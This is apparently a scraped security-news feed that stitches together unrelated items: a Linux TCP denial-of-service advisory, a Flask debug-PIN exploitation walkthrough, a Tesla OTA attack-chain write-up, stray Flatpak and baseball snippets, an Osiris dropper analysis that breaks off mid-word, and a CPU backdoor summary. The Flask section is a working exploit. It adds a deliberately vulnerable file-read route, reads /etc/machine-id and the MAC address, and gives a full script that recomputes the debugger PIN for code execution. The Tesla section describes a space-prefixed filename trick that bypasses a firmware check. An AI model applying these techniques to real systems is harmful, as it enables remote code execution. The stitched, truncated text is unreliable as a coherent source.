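Follow the "腾讯科恩实验室" (Tencent Keen Security Lab) WeChat official account and reply "车联网安全" to get the Black Hat 2018 talk white paper!

*Author: Tencent Keen Security Lab. Please credit FreeBuf.COM when reposting.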


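          CVE-2018-5390: Remote denial-of-service vulnerability found in the Linux kernel's TCP implementation

Report ID: B6-2018-081001

Report source: 360CERT

Report author: 360CERT

Updated: 2018-08-10

0x00 Vulnerability description

In Linux kernel versions 4.9+, an attacker can send crafted packets that make the kernel saturate the CPU while executing the tcp_collapse_ofo_queue() and tcp_prune_ofo_queue() functions, resulting in a denial of service. To sustain the denial of service, the attacker needs continuous two-way TCP sessions to a reachable open port, so the attack cannot be carried out with spoofed IP addresses.

The 360-CERT team has assessed the vulnerability as high risk and recommends that users defend against it by following the remediation advice below.

0x01 Affected vendors

  • Red Hat, Inc.
  • Debian GNU/Linux
  • Ubuntu
  • FreeBSD Project

0x02 Security recommendations

1. Check whether the relevant vendor has released a patch and, if so, update promptly.

2. Apply the fix manually (see reference link 3).

3. Check whether the system's CPU usage is abnormally high and whether it is receiving large volumes of abnormal data; if so, block the corresponding IPs at the firewall.

0x03 Timeline

2018-07-15 Discovered and reported by overseas security researcher Juha-Matti Tilli

2018-08-10 360-CERT publishes this alert

0x04 Reference links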

  1. https://www.kb.cert.org/vuls/id/962459

  2. https://nvd.nist.gov/vuln/detail/CVE-2018-5390

  3. https://git.kernel.org/pub/scm/linux/kernel/git/davem/net.git/commit/?id=1a4f14bab1868b443f0dd3c55b689a478f82e72e

  4. https://paper.seebug.org/659/

  5. https://0day.city/cve-2018-5390.html


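          Flask debug PIN security issue

During the finals of the national competition I saw p0 mention that Flask's debug mode, combined with an arbitrary file read, leads to arbitrary code execution. I was very interested at the time, but things got busy afterwards and I never had time to look into it. Today I finally reproduced the issue.

It mainly relies on the fact that Flask generates a Debugger PIN when running in debug mode: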

kingkk@ubuntu:~/Code/flask$ python3 app.py 
 * Running on http://0.0.0.0:8080/ (Press CTRL+C to quit)
 * Restarting with stat
 * Debugger is active!
 * Debugger pin code: 169-851-075

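With this PIN we can execute arbitrary Python code on the error page.

The problem lies in how this PIN is generated. Start the same Flask application several times on the same machine and the PIN turns out to be fixed: it is generated from a set of fixed values. Let's look directly at how the Flask source code does it.

Test environment:

  • Ubuntu 16.04
  • python 3.5
  • Flask 0.10.1

A simple hello world program, app.py: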

# -*- coding: utf-8 -*-
from flask import Flask
app = Flask(__name__)

@app.route("/")
def hello():
    return 'hello world!'

if __name__ == "__main__":
    app.run(host="0.0.0.0", port=8080, debug=True)

Set a breakpoint on app.run in PyCharm and start debug mode.

Because the code is written quite conventionally, it is easy to find the part that generates the PIN. The rough trace is as follows:

app.py 
python3.5/site-packages/flask/app.py  around line 772: run_simple(host, port, self, **options)
python3.5/site-packages/werkzeug/serving.py  around line 751: application = DebuggedApplication(application, use_evalex)
python3.5/site-packages/werkzeug/debug/__init__.py

The key part is in debug/__init__.py. First, look at the _get_pin function:

def _get_pin(self):
    if not hasattr(self, '_pin'):
        self._pin, self._pin_cookie = get_pin_and_cookie_name(self.app)
    return self._pin

Follow it into the get_pin_and_cookie_name function:

def get_pin_and_cookie_name(app):
    """Given an application object this returns a semi-stable 9 digit pin
    code and a random key.  The hope is that this is stable between
    restarts to not make debugging particularly frustrating.  If the pin
    was forcefully disabled this returns `None`.

    Second item in the resulting tuple is the cookie name for remembering.
    """
    pin = os.environ.get('WERKZEUG_DEBUG_PIN')
    rv = None
    num = None

    # Pin was explicitly disabled
    if pin == 'off':
        return None, None

    # Pin was provided explicitly
    if pin is not None and pin.replace('-', '').isdigit():
        # If there are separators in the pin, return it directly
        if '-' in pin:
            rv = pin
        else:
            num = pin

    modname = getattr(app, '__module__',
                      getattr(app.__class__, '__module__'))

    try:
        # `getpass.getuser()` imports the `pwd` module,
        # which does not exist in the Google App Engine sandbox.
        username = getpass.getuser()
    except ImportError:
        username = None

    mod = sys.modules.get(modname)

    # This information only exists to make the cookie unique on the
    # computer, not as a security feature.
    probably_public_bits = [
        username,
        modname,
        getattr(app, '__name__', getattr(app.__class__, '__name__')),
        getattr(mod, '__file__', None),
    ]

    # This information is here to make it harder for an attacker to
    # guess the cookie name.  They are unlikely to be contained anywhere
    # within the unauthenticated debug page.
    private_bits = [
        str(uuid.getnode()),
        get_machine_id(),
    ]

    h = hashlib.md5()
    for bit in chain(probably_public_bits, private_bits):
        if not bit:
            continue
        if isinstance(bit, text_type):
            bit = bit.encode('utf-8')
        h.update(bit)
    h.update(b'cookiesalt')

    cookie_name = '__wzd' + h.hexdigest()[:20]

    # If we need to generate a pin we salt it a bit more so that we don't
    # end up with the same value and generate out 9 digits
    if num is None:
        h.update(b'pinsalt')
        num = ('%09d' % int(h.hexdigest(), 16))[:9]

    # Format the pincode in groups of digits for easier remembering if
    # we don't have a result yet.
    if rv is None:
        for group_size in 5, 4, 3:
            if len(num) % group_size == 0:
                rv = '-'.join(num[x:x + group_size].rjust(group_size, '0')
                              for x in range(0, len(num), group_size))
                break
        else:
            rv = num

    return rv, cookie_name

The returned rv variable is the generated PIN.

The most important part is this hashing section:

for bit in chain(probably_public_bits, private_bits):
    if not bit:
        continue
    if isinstance(bit, text_type):
        bit = bit.encode('utf-8')
    h.update(bit)
h.update(b'cookiesalt')

It chains the two lists together and then hashes their values in a loop.

The two lists are defined as follows:

probably_public_bits = [
        username,
        modname,
        getattr(app, '__name__', getattr(app.__class__, '__name__')),
        getattr(mod, '__file__', None),
    ]

    private_bits = [
        str(uuid.getnode()),
        get_machine_id(),
    ]

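We can first look at the values in the debugger and use them for further analysis.

We can see that:

username is the user who started this Flask application

modname is flask.app

getattr(app, '__name__', getattr(app.__class__, '__name__')) is Flask

getattr(mod, '__file__', None) is the absolute path of app.py inside the flask directory

uuid.getnode() is the MAC address of the current machine, and str(uuid.getnode()) is the decimal representation of that MAC address

For get_machine_id(), let's follow it in and take a look: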

def _generate():
        # Potential sources of secret information on linux.  The machine-id
        # is stable across boots, the boot id is not
        for filename in '/etc/machine-id', '/proc/sys/kernel/random/boot_id':
            try:
                with open(filename, 'rb') as f:
                    return f.readline().strip()
            except IOError:
                continue

        # On OS X we can use the computer's serial number assuming that
        # ioreg exists and can spit out that information.
        try:
            # Also catch import errors: subprocess may not be available, e.g.
            # Google App Engine
            # See https://github.com/pallets/werkzeug/issues/925
            from subprocess import Popen, PIPE
            dump = Popen(['ioreg', '-c', 'IOPlatformExpertDevice', '-d', '2'],
                         stdout=PIPE).communicate()[0]
            match = re.search(b'"serial-number" = <([^>]+)', dump)
            if match is not None:
                return match.group(1)
        except (OSError, ImportError):
            pass

        # On Windows we can use winreg to get the machine guid
        wr = None
        try:
            import winreg as wr
        except ImportError:
            try:
                import _winreg as wr
            except ImportError:
                pass
        if wr is not None:
            try:
                with wr.OpenKey(wr.HKEY_LOCAL_MACHINE,
                                'SOFTWARE\\Microsoft\\Cryptography', 0,
                                wr.KEY_READ | wr.KEY_WOW64_64KEY) as rk:
                    machineGuid, wrType = wr.QueryValueEx(rk, 'MachineGuid')
                    if (wrType == wr.REG_SZ):
                        return machineGuid.encode('utf-8')
                    else:
                        return machineGuid
            except WindowsError:
                pass

    _machine_id = rv = _generate()
    return rv

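It first tries to read the value in /etc/machine-id or /proc/sys/kernel/random/boot_id, and returns it directly if one is present.

If it is running on Windows and cannot read those two files, it fetches the MachineGuid value under SOFTWARE\\Microsoft\\Cryptography in the registry and returns it.

Here it is the value in the /etc/machine-id file.

So once we can obtain these 6 values, we can work out the generated PIN, which leads to arbitrary code execution.

Modify the earlier app.py: add an arbitrary file read feature and make the index page throw an exception (that is, provide a code execution point).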

# -*- coding: utf-8 -*-
import pdb
from flask import Flask, request
app = Flask(__name__)

@app.route("/")
def hello():
    return Hello['a']

@app.route("/file")
def file():
    filename = request.args.get('filename')
    try:
        with open(filename, 'r') as f:
            return f.read()
    except:
        return 'error'

if __name__ == "__main__":
    app.run(host="0.0.0.0", port=8080, debug=True)

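Try to obtain those 6 values:

username # the user name

modname # flask.app

getattr(app, '__name__', getattr(app.__class__, '__name__')) # Flask

getattr(mod, '__file__', None) # absolute path of app.py inside the flask directory

uuid.getnode() # MAC address in decimal

get_machine_id() # /etc/machine-id

First, get /etc/machine-id:

19949f18ce36422da1402b3e3fe53008

Then the MAC address (the network interface in my virtual machine is ens33; normally it would be eth0).

The debug error page can also be used to get some path information.

This way the username and the absolute path of app.py are both obtained directly.

Then, using these values, the PIN can be worked out: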

import hashlib
from itertools import chain
probably_public_bits = [
    'kingkk',# username
    'flask.app',# modname
    'Flask',# getattr(app, '__name__', getattr(app.__class__, '__name__'))
    '/home/kingkk/.local/lib/python3.5/site-packages/flask/app.py' # getattr(mod, '__file__', None),
]

private_bits = [
    '52242498922',# str(uuid.getnode()),  /sys/class/net/ens33/address
    '19949f18ce36422da1402b3e3fe53008'# get_machine_id(), /etc/machine-id
]

h = hashlib.md5()
for bit in chain(probably_public_bits, private_bits):
    if not bit:
        continue
    if isinstance(bit, str):
        bit = bit.encode('utf-8')
    h.update(bit)
h.update(b'cookiesalt')

cookie_name = '__wzd' + h.hexdigest()[:20]

num = None
if num is None:
    h.update(b'pinsalt')
    num = ('%09d' % int(h.hexdigest(), 16))[:9]

rv =None
if rv is None:
    for group_size in 5, 4, 3:
        if len(num) % group_size == 0:
            rv = '-'.join(num[x:x + group_size].rjust(group_size, '0')
                          for x in range(0, len(num), group_size))
            break
    else:
        rv = num

print(rv)

The computed PIN is

169-851-075

which is the same as the PIN printed in the terminal:

kingkk@ubuntu:~/Code/flask$ python3 app.py 
 * Running on http://0.0.0.0:8080/ (Press CTRL+C to quit)
 * Restarting with stat
 * Debugger is active!
 * Debugger pin code: 169-851-075

Try entering it on the debug page.

Command execution succeeds.
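The chain above depends on two properties of the modified app.py: the /file route opens whatever path it is given, and the debugger is served on 0.0.0.0. The following is an added example, not part of the original post, showing a confined replacement for the open(filename) call and a start-up check for the debugger exposure; `resolve_safe`, `read_public_file`, `debugger_exposed` and the sample directory layout are hypothetical names and constructed data.

```python
import ipaddress
import os
import tempfile


def resolve_safe(base_dir, filename):
    """Return the real path of `filename` inside `base_dir`, or None when the
    request must be refused. Stands in for open(filename) in the /file route."""
    if not filename or "\x00" in filename:
        return None
    base = os.path.realpath(base_dir)
    # realpath() collapses ".." and follows symlinks, so the comparison below
    # is made on the file that would really be opened. An absolute filename
    # makes join() discard `base`; the prefix check then rejects it.
    candidate = os.path.realpath(os.path.join(base, filename))
    if os.path.commonpath([base, candidate]) != base:
        return None
    if not os.path.isfile(candidate):
        return None
    return candidate


def read_public_file(base_dir, filename):
    """Read a file only if it resolves to a location under base_dir."""
    path = resolve_safe(base_dir, filename)
    if path is None:
        return None
    with open(path, "r") as f:
        return f.read()


def debugger_exposed(host, debug):
    """True when app.run(host=host, debug=debug) would offer the debugger
    console to clients other than the local machine."""
    if not debug:
        return False
    if host == "localhost":
        return False
    try:
        return not ipaddress.ip_address(host).is_loopback
    except ValueError:
        return True  # unknown hostname: treat it as exposed


def build_sample_tree():
    """Constructed sample data: a public directory, a file outside it, and a
    symlink inside the public directory that points outside."""
    root = tempfile.mkdtemp()
    public = os.path.join(root, "public")
    os.mkdir(public)
    with open(os.path.join(public, "readme.txt"), "w") as f:
        f.write("hello")
    secret = os.path.join(root, "secret.txt")
    with open(secret, "w") as f:
        f.write("stand-in for /etc/machine-id")
    os.symlink(secret, os.path.join(public, "link"))
    return public, secret


if __name__ == "__main__":
    public, secret = build_sample_tree()
    requests = ["readme.txt", "../secret.txt", "/etc/machine-id",
                "/sys/class/net/ens33/address", "link", secret]
    for name in requests:
        print(repr(name), "->", read_public_file(public, name))
    print("0.0.0.0 with debug=True exposed:", debugger_exposed("0.0.0.0", True))
```

With the file read confined, the machine-id and MAC address inputs of the PIN are no longer readable through the application; with the debugger bound to loopback or disabled, the PIN prompt is not reachable remotely in the first place.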


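          Tencent Keen Security Lab's Black Hat USA 2018 talk explained

Background

OTA (Over-The-Air) updating is one of the core capabilities in the automotive industry's shift to intelligent, connected vehicles. At Black Hat USA 2018, Tencent Keen Security Lab presented the results of its 2017 security research on Tesla's advanced OTA functionality. The work plays a major positive role in helping the automotive industry adopt connected-vehicle technology safely and reliably, and the talk is also the first public disclosure worldwide of information-security research involving an automotive advanced driver-assistance system (ADAS; Tesla's system is named Autopilot). For more details, follow Tencent Keen Security Lab's official WeChat account, KeenSecurityLab, and reply "车联网安全" to get the white paper with the technical details of this research.

Talk summary

In 2016 and 2017, Tencent Keen Security Lab ran attack tests against the Tesla Model S and Model X for two consecutive years, in a remote attack scenario that avoids physical contact with the car. At last year's Black Hat USA, Keen Lab researchers presented the specific details covered by Tesla's 2016 acknowledgement of their research and showed attendees a series of security vulnerabilities in Tesla cars, which was well received. In addition, they used a light-and-dance show to demonstrate the impact of attacks using another batch of vulnerabilities found in 2017, but the details of those vulnerabilities were not published. This year, the talk goes further into the technical details behind the 2017 Easter-egg video. Besides describing Tesla's cloud-driven over-the-air (OTA) update mechanism and showing some new techniques developed for the attack chain, the talk focuses on several serious security vulnerabilities found during testing.

About the authors

Liu Ling (刘令), researcher at Tencent Keen Security Lab, focuses on reverse engineering, vulnerability discovery and vulnerability research, and has taken part in security research on Tesla and other cars many times. He has found several virtualization vulnerabilities in QEMU and XEN, and is also a CTF enthusiast.

Zhang Wenkai (张文凯), researcher at Tencent Keen Security Lab, has taken part in many car security research projects on Tesla, BMW and others. He is mainly responsible for automotive CAN network and firmware analysis, has extensive experience in embedded systems software development, and is familiar with the ECU design process and automotive CAN network structure.

Du Yuefeng (杜岳峰), researcher at Tencent Keen Security Lab, has taken part in Tesla car security research many times and has a strong interest in reverse engineering and malware analysis.

Talk analysis

At this year's Black Hat USA, we present the details of the vulnerabilities in the 2017 attack chain and share how those vulnerabilities were used to stage the light show. In addition, the security of autonomous-driving systems has become a new hot topic, and we show our security research on the driver-assistance module in Tesla cars (Autopilot, also called APE). Finally, as before, we describe how Tesla fixed the vulnerabilities, and stress once again that overall security can only be raised effectively when security researchers, the security community and device vendors work together.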

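Some of the hardware units involved in the attack, and how they are connected, are shown in the figure below. Last year we used two vulnerabilities in WebKit to achieve arbitrary code execution in the browser. This year is similar: the whole attack again starts from a WebKit vulnerability.

The CID has a browser built on the WebKit engine; at the time of the vulnerability report, the browser was still at version 534.34. That version of the WebKit engine contains a use-after-free (UAF) vulnerability; the figure below is the PoC code for it:

[Figure]

The vulnerability lies in the handling of SVGTransformList elements. The element holds several SVGTransform instances, and the SVGMatrix structures of those instances are stored in a Vector. When the Initialize or clear method of SVGTransformList is called, the Vector is freed, but the pointer used to access the Matrix in the Vector remains. By exploiting this UAF with a carefully arranged memory layout, the properties of structures such as ArrayStorage and Uint32Array can be used to obtain arbitrary memory read and write, and from there code execution in the browser.

With browser privileges obtained, the next step is to break out of the restrictions that the kernel and other protections place on the browser and get a root shell. In 2016 we did this by exploiting a vulnerability in the Linux kernel, but in 2017 Tesla had fixed quite a lot of kernel vulnerabilities, so we had to find a new one.

In the 2017 head-unit firmware, the browser process can access only two files, /dev/nvmap and /dev/nvhost-ctrl, both of which are driver interfaces for communicating with the NVIDIA Tegra chip. In the code behind these two interfaces we found a vulnerability that lets user space decrement by 1 the value at an arbitrary kernel-space memory address.

The vulnerability is in the NVMap driver. When the NVMAP_IOC_PIN_MULT command is handled, the array of pointers supplied by the user is not validated properly: if it contains an invalid structure, that structure's reference count is decremented by 1, and the pointer to the reference count is controlled from user mode. This means user mode can decrement by 1 any memory address in kernel mode. Using this vulnerability together with other gadgets in the kernel, we could read and write arbitrary addresses in kernel space. Tampering with the relevant syscall and AppArmor configuration then yields a root shell.

Getting a root shell shows that the CID is fully compromised; the next target is the gateway. In 2016 we reported some design flaws in the gateway. After receiving the report, Tesla fixed them by adding a signature mechanism that restricts the transfer of update software to the gateway: unsigned update software cannot be transferred to it, so in theory tampered update software cannot be delivered by a non-physical attack.

During a security audit of the new software, however, we found inconsistent behaviour in the update process. As the figure below shows, the gateway's file-transfer protocol restricts direct transfer of the update software, so update software named "boot.img" cannot be transferred to the gateway directly; but the filesystem's rename behaviour and the file-transfer protocol's rename behaviour are inconsistent. The filesystem ignores leading spaces in the target filename, so the target name "\x20boot.img" is understood by the filesystem as "boot.img", which bypasses the filename check on the update software.

[Figure]

After flashing our modified update software this way and rebooting the gateway so that it runs the update software, our modified update code executes on the gateway and can plant a backdoor or bypass the original update software's firmware-signature check.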
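The filename check described above (the same gateway issue also appears in the earlier copy of this talk write-up on this page) fails because the transfer layer and the filesystem disagree about what a name means. The following is an added example, not Tesla's or Keen Lab's code: a toy model with the weak comparison beside one that asks the filesystem for the resolved name. `ToyGatewayFS`, `upload.tmp` and the file contents are hypothetical; the only behaviour taken from the write-up is that leading spaces in the target name are ignored.

```python
PROTECTED_NAMES = {"boot.img"}  # the name the write-up says cannot be transferred directly


class ToyGatewayFS:
    """Hypothetical stand-in for the gateway filesystem. The only behaviour
    taken from the write-up: leading spaces in a target name are ignored."""

    def __init__(self):
        # Constructed contents: one vendor-signed updater already present.
        self.files = {"boot.img": b"vendor-signed updater"}

    def resolve(self, name):
        """Name under which the filesystem will really store `name`."""
        return name.lstrip(" ")

    def write(self, name, data):
        self.files[self.resolve(name)] = data

    def rename(self, src, dst):
        self.files[self.resolve(dst)] = self.files.pop(self.resolve(src))


def raw_name_check(fs, dst):
    """Weak form: the transfer layer compares the string it received."""
    return dst not in PROTECTED_NAMES


def resolved_name_check(fs, dst):
    """Corrected form: ask the filesystem which entry `dst` will become and
    compare that, so the check and the later use agree by construction."""
    return fs.resolve(dst) not in PROTECTED_NAMES


def try_rename(check, dst):
    """Upload an unsigned file under a harmless name, then request a rename
    to `dst`. Returns (request_accepted, boot_img_still_vendor_signed)."""
    fs = ToyGatewayFS()
    fs.write("upload.tmp", b"unsigned updater")
    accepted = check(fs, dst)
    if accepted:
        fs.rename("upload.tmp", dst)
    return accepted, fs.files["boot.img"] == b"vendor-signed updater"


if __name__ == "__main__":
    for check in (raw_name_check, resolved_name_check):
        for dst in ("boot.img", "\x20boot.img", "notes.txt"):
            print(check.__name__, repr(dst), try_rename(check, dst))
```

The check should call the same resolution routine the storage layer uses rather than a second copy of the normalization rules, because a reimplementation can drift from the filesystem's real behaviour and reopen the gap.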

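We also studied the whole OTA update process. Tesla's OTA update process can be roughly described by the key steps shown in the figure below.

After the cloud delivers the firmware download address over Tesla's own handshake protocol, cid-updater on the Tesla CID downloads the firmware from the cloud, decrypts it and verifies its integrity. Then, in a manner similar to A/B Update, the other networked components in the car with substantial computing power (such as the IC and APE) upgrade from the firmware files that cid-updater provides.

cid-updater is also responsible for comparing the directory information in the firmware package with the vehicle configuration, generating the release.tgz file from it, and handing that to the gateway together with the update software boot.img mentioned above. The gateway runs this update software and updates the twenty-odd ECUs connected to it.

To demonstrate our understanding of the vehicle's electrical system as a whole, we customized and demonstrated the Easter-egg feature that Tesla introduced at the end of 2016. The figure below shows the ECUs that play the main roles in the Easter egg:

[Figure]

First, the CID sends a start signal to trigger the sequence. The signal goes to the BCCEN; after initializing the relevant hardware, that controller confirms whether the vehicle is ready to start the Easter egg and waits for the button signal from the key. Once the button is pressed, the CID starts playing music, while the BCCEN and the other ECUs drive their components on the predetermined schedule according to the action tables stored in each ECU.

So, to implement a custom Easter egg, we dynamically modified several checkpoints in the CID, modified the action tables in the ECU firmware, and flashed the modified firmware into the ECUs.

Finally, as an exploration of cutting-edge technology, we studied security vulnerabilities in ape-updater. This program is part of Tesla's OTA framework and is responsible for updating the entire APE system.

The program exposes two service ports: port 25974 provides an interactive shell and a number of commands that the CID uses for control; port 28496 serves the files that other components need through an HTTP server.

The handshake command offered on port 25974 requests a JSON string from the server, which is later given to the install command to parse. In one particular version of the Tesla APE firmware we found a command named m3-factory-deploy, which can override the JSON returned by handshake so that attacker-supplied JSON gets parsed.

Using the self_serve key in the JSON, the APE can be asked to expose the file /var/etc/saccess/tesla1 through the HTTP server, so its contents can be obtained. With that as a credential, the command-execution privileges built into ape-updater can be obtained through port 25974, SSH can be re-enabled, and arbitrary programs can be run on the APE as root.

After all of the vulnerabilities above were reported to Tesla, Tesla responded promptly, including:

  • Fixing the WebKit vulnerability
  • Fixing the kernel vulnerability in NVMap together with NVIDIA
  • Fixing the vulnerability in the Gateway

We also noted that Tesla keeps improving the security of its systems, for example:

  • Stricter iptables restrictions
  • Further hardening of several key programs in the OTA framework
  • Reduced permissions for the tokens in the saccess folder
  • Blocking system downgrades
  • ……

We believe that throughout this process, Tesla's professional security response team and its OTA mechanism played a key role and prevented car owners from being exposed to further threats.

Because of space limits we have only described the type and core principle of each vulnerability; readers interested in our research can find more in our white paper 《穿云拨雾:对特斯拉汽车网关、车身控制模块以及辅助驾驶(Autopilot)ECU的渗透测试》 (Parting the Clouds and Mist: Penetration Testing of the Tesla Gateway, Body Control Module and Driver-Assistance (Autopilot) ECUs).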

          FLATPAK ?
The new Linux Mint 18.3 & 19.0 have FLATPAK. Some developers have fully embraced FLATPAK and that irritates me, that & the new 4.15 kernel. It is bad enough installing programs. You either use the...
          Five-run 5th too much for Clinton to overcome
Clinton, IA - A Eugene Helder home run was not enough for the Clinton LumberKings who fell to the Cedar Rapids Kernels 9-4 on Thursday night at Ashfor... - MWL Clinton LumberKings
          Osiris dropper found using process doppelgänging

Process doppelgänging, a new technique of impersonating a process, was published last year at the Black Hat conference. After some time, a ransomware named SynAck was discovered that adopted this process for malicious purposes. However, this technique is still pretty rare in the wild. So, it was an interesting surprise to notice it in a dropper of the Osiris banking Trojan (a new version of the infamous Kronos).

The authors of this dropper were skilled, and they added several other tricks to spice the whole thing up. In this post, we will have a closer look at the loader’s implementation.

Analyzed sample

  • 5e6764534b3a1e4d3abacc4810b6985d original sample (stage 1)
  • 8d58c731f61afe74e9f450cc1c7987be stage 2
  • e8c39091cce419adee23153f30cefa5a Osiris core bot

Osiris is loaded in three steps:

Overview

The dropper creates a new process and injects the content inside:



Interestingly, when we look into the modules loaded in the process space of the injector, we can see an additional copy of NTDLL:



This is a well-known technique that some malware authors use in order to evade monitoring applications and hide the API calls that they used.

When we examine closely which functions are called from that additional NTDLL, we find more interesting details. It calls several APIs related to NTFS transactions. This brings to mind the technique of process doppelgänging, which relies on this mechanism.

Loading additional NTDLL

NTDLL is a special, low-level DLL. Basically, it is just a wrapper around syscalls. It does not have any dependencies on other DLLs in the system. Thanks to this, it can be loaded conveniently, without the need to fill its import table.

Other system DLLs, such as Kernel32, rely heavily on functions exported from NTDLL. This is why many user-land monitoring tools hook and intercept the functions exported by NTDLL: to watch what functions are being called and check whether the process displays any suspicious activity.

Of course malware authors know about this, so sometimes, in order to fool this mechanism, they load their own, fresh and unhooked copy of NTDLL from the disk. There are several ways to implement this. Let’s have a look at how the authors of the Osiris dropper did it.

Looking at the memory mapping, we see that the NTDLL is loaded as an image, just like other DLLs. However, it was not loaded by a typical LoadLibrary function, nor even by its low-level version from NTDLL, LdrLoadDll. Instead, the authors decided to load the file as a section, using the following functions:

  • ntdll.NtCreateFile to open the ntdll.dll file
  • ntdll.NtCreateSection to create a section out of this file
  • ntdll.ZwMapViewOfSection to map this section into the process address space

This was a smart move because the DLL looks like it was loaded in a typical way, and yet, if we monitor the LdrLoadDll function, we see nothing suspicious.

Implementation of process doppelgänging

In order to make their injection more stealthy, the authors took the original implementation of process doppelgänging a step further and used only low-level APIs. So, instead of calling the convenient wrappers from Kernel32, for most of the functions they called their equivalents from NTDLL. Moreover, they used a custom copy of this DLL.

First, they created a new suspended process. This is the process into which the payload will be injected. However, in this case, the authors decided to use a function from kernel32.dll: CreateProcessInternal.



Process doppelgänging then starts from creating a new transaction, within which a new file is created. The original implementation used CreateTransaction and CreateFileTransacted from Kernel32 for this purpose. But this is not the case here.

First, the function ZwCreateTransaction from NTDLL is called. Then, instead of CreateFileTransacted, the authors open the transacted file by RtlSetCurrentTransaction along with ZwCreateFile (the created file is %TEMP%\Liebert.bmp). Then, the dropper writes the content of the new executable, the second stage of the malware, to the file. Similarly, RtlSetCurrentTransaction with ZwWriteFile is used.



We can see that the buffer that is being written contains the new PE file: the second stage payload. Typically, for the process doppelgänging technique, the file is visible only within the transaction and cannot be opened by other processes, such as AV scanners.

After the file inside the transaction is created, it will be used to create a buffer in a special format, called a section. The function that can do it is available only via the low-level API: ZwCreateSection/NtCreateSection.



After the section is created, the file that was created is no longer needed. The transaction gets rolled back (by ZwRollbackTransaction), and the changes to the file are never saved on the disk.

Further, the created section will be used to load a PE file. After writing the payload into memory and setting the necessary patches, such as EP redirection, the process is resumed.
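From the monitoring side, both behaviours described in the "Loading additional NTDLL" and "Implementation of process doppelgänging" sections leave an ordered API sequence that can be matched per process. The following is an added example, not code from the original analysis: the event format (`pid`, `api`, handle fields) and the sample trace are constructed, and only the API names and the file name come from the text above.

```python
from collections import defaultdict

FINDING_NTDLL = "ntdll.dll mapped from a section instead of via LdrLoadDll"
FINDING_DOPPEL = "section created from a transacted file whose transaction was rolled back"


def _base(api):
    """Nt* and Zw* exports name the same call, so compare without the prefix."""
    return api[2:] if api[:2] in ("Nt", "Zw") else api


def detect(events):
    """Walk an ordered API trace and return a list of (pid, finding)."""
    state = defaultdict(lambda: {"cur_tx": None, "tx_files": {}, "written": set(),
                                 "tx_sections": {}, "ntdll_files": set(),
                                 "ntdll_sections": set()})
    findings = []
    for ev in events:
        s, api = state[ev["pid"]], _base(ev["api"])
        if api == "RtlSetCurrentTransaction":
            s["cur_tx"] = ev["tx"] or None          # tx 0 clears the current transaction
        elif api == "CreateFile":
            if s["cur_tx"]:
                s["tx_files"][ev["handle"]] = s["cur_tx"]
            elif ev.get("path", "").lower().endswith("\\ntdll.dll"):
                s["ntdll_files"].add(ev["handle"])
        elif api == "WriteFile" and ev["handle"] in s["tx_files"]:
            s["written"].add(ev["handle"])
        elif api == "CreateSection":
            fh = ev.get("file")
            if fh in s["written"]:
                s["tx_sections"][ev["handle"]] = s["tx_files"][fh]
            elif fh in s["ntdll_files"]:
                s["ntdll_sections"].add(ev["handle"])
        elif api == "MapViewOfSection" and ev["section"] in s["ntdll_sections"]:
            findings.append((ev["pid"], FINDING_NTDLL))
        elif api == "RollbackTransaction" and ev["tx"] in s["tx_sections"].values():
            findings.append((ev["pid"], FINDING_DOPPEL))
    return findings


def sample_trace():
    """Constructed trace: pid 4242 follows the sequence in the write-up,
    pid 1000 commits a normal transacted write, pid 1001 rolls one back."""
    def ev(pid, api, **kw):
        return dict(pid=pid, api=api, **kw)
    return [
        ev(4242, "NtCreateFile", path="C:\\Windows\\System32\\ntdll.dll", handle=0x10),
        ev(4242, "NtCreateSection", file=0x10, handle=0x14),
        ev(4242, "ZwMapViewOfSection", section=0x14),
        ev(1000, "ZwCreateTransaction", tx=0x30),
        ev(1000, "RtlSetCurrentTransaction", tx=0x30),
        ev(1000, "ZwCreateFile", path="C:\\ProgramData\\app\\config.new", handle=0x34),
        ev(1000, "ZwWriteFile", handle=0x34),
        ev(1000, "RtlSetCurrentTransaction", tx=0),
        ev(1000, "ZwCommitTransaction", tx=0x30),
        ev(4242, "ZwCreateTransaction", tx=0x20),
        ev(4242, "RtlSetCurrentTransaction", tx=0x20),
        ev(4242, "ZwCreateFile", path="%TEMP%\\Liebert.bmp", handle=0x24),
        ev(4242, "ZwWriteFile", handle=0x24),
        ev(4242, "RtlSetCurrentTransaction", tx=0),
        ev(4242, "ZwCreateSection", file=0x24, handle=0x28),
        ev(1001, "ZwCreateTransaction", tx=0x40),
        ev(1001, "RtlSetCurrentTransaction", tx=0x40),
        ev(1001, "ZwCreateFile", path="C:\\Temp\\draft.tmp", handle=0x44),
        ev(1001, "ZwWriteFile", handle=0x44),
        ev(1001, "ZwRollbackTransaction", tx=0x40),
        ev(4242, "ZwRollbackTransaction", tx=0x20),
    ]


if __name__ == "__main__":
    for pid, finding in detect(sample_trace()):
        print(pid, finding)
```

Because the dropper calls these functions through its own unhooked copy of NTDLL, the trace has to come from a source that does not depend on user-land hooks in the original NTDLL.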


Second stage loader

The next layer (8d58c731f61afe74e9f450cc1c7987be) is not the core yet, but the next stage of the loader. The way it loads the final payload is much simpler, yet still not trivial. The code of Osiris is unpacked piece by piece and manually loaded along with its dependencies into a newly allocated memory area within the loader process.

After this self-injection, the loader jumps into the payload’s entry point:


The interesting thing is that the entry poi
          Christopher Domas: Hardware Backdoors in X86 CPUs
project:rosenbridge

: hardware backdoors in x86 CPUs

github.com/xoreaxeaxeax/rosenbridge // domas // @xoreaxeaxeax


Overview

project:rosenbridge reveals a hardware backdoor in some desktop, laptop, and embedded x86 processors.

The backdoor allows ring 3 (userland) code to circumvent processor protections to freely read and write ring 0 (kernel) data. While the backdoor is typically disabled (requiring ring 0 execution to enable it), we have found that it is enabled by default on some systems.

This repository contains utilities to check if your processor is affected, close the backdoor if it is present, and the research and tools used to discover and analyze the backdoor.

The Backdoor

The rosenbridge backdoor is a small, non-x86 core embedded alongside the main x86 core in the CPU. It is enabled by a model-specific-register control bit, and then toggled with a launch-instruction. The embedded core is then fed commands, wrapped in a specially formatted x86 instruction. The core executes these commands (which we call the 'deeply embedded instruction set'), bypassing all memory protections and privilege checks.

While the backdoor should require kernel level access to activate, it has been observed to be enabled by default on some systems, allowing any unprivileged code to modify the kernel.

The rosenbridge backdoor is entirely distinct from other publicly known coprocessors on x86 CPUs, such as the Management Engine or Platform Security Processor; it is more deeply embedded than any known coprocessor, having access to not only all of the CPU's memory, but its register file and execution pipeline as well.

Affected Systems

It is thought that only VIA C3 CPUs are affected by this issue. The C-series processors are marketed towards industrial automation, point-of-sale, ATM, and healthcare hardware, as well as a variety of consumer desktop and laptop computers.

Looking Forward

The scope of this vulnerability is limited; generations of CPUs after the C3 no longer contain this feature.

